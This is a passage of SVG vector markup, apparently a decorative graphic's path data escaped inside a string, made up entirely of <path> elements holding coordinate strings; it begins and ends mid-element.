-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path 